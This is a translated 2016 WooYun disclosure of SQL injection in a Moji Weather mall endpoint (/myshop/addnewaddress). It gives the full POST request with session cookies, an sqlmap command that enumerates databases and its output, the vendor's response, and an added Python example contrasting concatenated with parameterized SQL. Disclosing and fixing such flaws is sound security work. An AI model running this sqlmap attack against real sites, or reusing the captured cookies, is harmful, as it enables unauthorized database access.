SQL injection in a Moji Weather (墨迹天气) endpoint


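Vulnerability details

Disclosure status:

2016-04-25: Details reported to the vendor; awaiting vendor handling
2016-04-27: Vendor confirmed; details disclosed to the vendor only
2016-05-07: Details disclosed to core white hats and experts in related fields
2016-05-17: Details disclosed to regular white hats
2016-05-27: Details disclosed to intern white hats
2016-06-11: Details disclosed to the public

Brief description:

As the title says.

Detailed description:

Code:
POST injection: sqlmap.py -r 1.txt --dbs
-------------POST request--------------------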
POST /myshop/addnewaddress HTTP/1.1
Host: mall.moji.com
Proxy-Connection: keep-alive
Content-Length: 223
Accept: application/json
Origin: http://mall.moji.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://mall.moji.com/appmall/addmyaddress/303/0/0//30912644
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: 95c3_f2f1_saltkey=BnP2jU2i; 95c3_f2f1_lastvisit=1461512525; _gat=1; 95c3_f2f1_ulastactivity=007bVQljxo3T7iodgIY6kXKWLQYtnR0mUrYaTjRxDXBEsuc%2F5AWU; 95c3_f2f1_auth=8d28nu8ZL8lUxTNB38jCZtcm814riUpex1CN9Ul0DpNNNq%2BiFUY6NhqEtVTuLmxSjjg911m6O1ZPqz9J5svuEgrfzA; 95c3_f2f1_nofavfid=1; 95c3_f2f1_home_diymode=1; 95c3_f2f1_sid=lcN6TE; 95c3_f2f1_lastact=1461516316%09home.php%09spacecp; 95c3_f2f1_noticeTitle=1; PHPSESSID=tuepaaqgk46jkqsudff50c16r6; channel=default; 303=%7B%22buy_way%22%3A%220%22%2C%22way_id%22%3A%220%22%7D; goods_id=303; sku_total=1; product_size01=%E9%93%B6%E8%89%B2%E9%95%9C%E7%89%87; product_num=1; moji_sessionid=AES6D7177316B516A7A39316874306E4763612F4E4759513D3D; snsid=30912644; good_data_product_no=%5B%22303%22%5D; good_data_name_json=%5B%223M%5Cu62a4%5Cu76ee%5Cu955c1791T%5C%2F1790G%22%5D; product_price_json=%5B%2269.00%22%5D; shop_price_json=%5B%2299.00%22%5D; goods_ids=303; __ads_session=KIROnPAYtgie93EAKwA=; _ga=GA1.2.1391845924.1461516131; _yd_=GA1.3.451698722.1461516330; Hm_lvt_4bd2403ae3a05b9a989b28908b95bef5=1461516331,1461516647; Hm_lpvt_4bd2403ae3a05b9a989b28908b95bef5=1461516652; province=undefined; city=undefined; county=undefined

username=%E9%BB%91%E8%89%B2%E9%94%AE%E7%9B%98&province=%E4%B8%8A%E6%B5%B7%E5%B8%82&city=%E4%B8%8A%E6%B5%B7%E5%B8%82&district=%E5%AE%9D%E5%B1%B1%E5%8C%BA&addressDetail=11111&postcode=111111&mobile=13444455555&userid=30912644



Database

Code:
available databases [1]:
[*] mojimall




Proof of vulnerability:

Same request and sqlmap result as in the detailed description above.

 


 

Fix:

Filter the input.
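An added example, not the vendor's code and not part of the original report: the page does not show the server-side code behind /myshop/addnewaddress, so Python with sqlite3 stands in for it, and the table layout, function names and field formats are assumptions. Using the field names from the POST body, it contrasts an INSERT built by string concatenation with one that validates the fixed-format fields and binds every value as a parameter.

```python
import re
import sqlite3

# Field names come from the POST body on this page; the table layout is assumed.
FIELDS = ("username", "province", "city", "district",
          "addressDetail", "postcode", "mobile", "userid")

# Allow-list patterns for the fields with a fixed shape (assumed formats).
PATTERNS = {
    "postcode": re.compile(r"\d{6}"),
    "mobile": re.compile(r"1\d{10}"),
    "userid": re.compile(r"\d{1,12}"),
}

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE address (%s)" % ", ".join(FIELDS))
    return db

def add_address_unsafe(db, form):
    """Anti-pattern: request values are pasted into the SQL text."""
    values = ", ".join("'%s'" % form[f] for f in FIELDS)
    db.execute("INSERT INTO address VALUES (%s)" % values)

def add_address_safe(db, form):
    """Validate fixed-format fields, then bind every value as a parameter."""
    for name, pattern in PATTERNS.items():
        if not pattern.fullmatch(form.get(name, "")):
            raise ValueError("invalid " + name)
    placeholders = ", ".join("?" for _ in FIELDS)
    db.execute("INSERT INTO address VALUES (%s)" % placeholders,
               [form[f] for f in FIELDS])

def demo():
    # Constructed input: an ordinary apostrophe in the free-text address field.
    form = {"username": "test", "province": "Shanghai", "city": "Shanghai",
            "district": "Baoshan", "addressDetail": "Room 5, O'Neil Rd",
            "postcode": "111111", "mobile": "13444455555", "userid": "30912644"}
    db = make_db()
    try:
        add_address_unsafe(db, form)
        unsafe_ok = True
    except sqlite3.OperationalError:
        unsafe_ok = False  # the quote changed the structure of the statement
    add_address_safe(db, form)
    stored = db.execute("SELECT addressDetail FROM address").fetchall()
    return unsafe_ok, stored
```

Pattern checks only cover fields with a fixed shape; free-text fields such as addressDetail rely on parameter binding, which keeps the value out of the SQL grammar whatever it contains.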

Copyright notice: when reposting, credit the source 黑色键盘丶@乌云 (WooYun)


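Vulnerability response

Vendor response:

Severity: Medium

Vulnerability rank: 6

Confirmed: 2016-04-27 15:52

Vendor reply:

Thanks for the heads-up.

Latest status:

None yet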

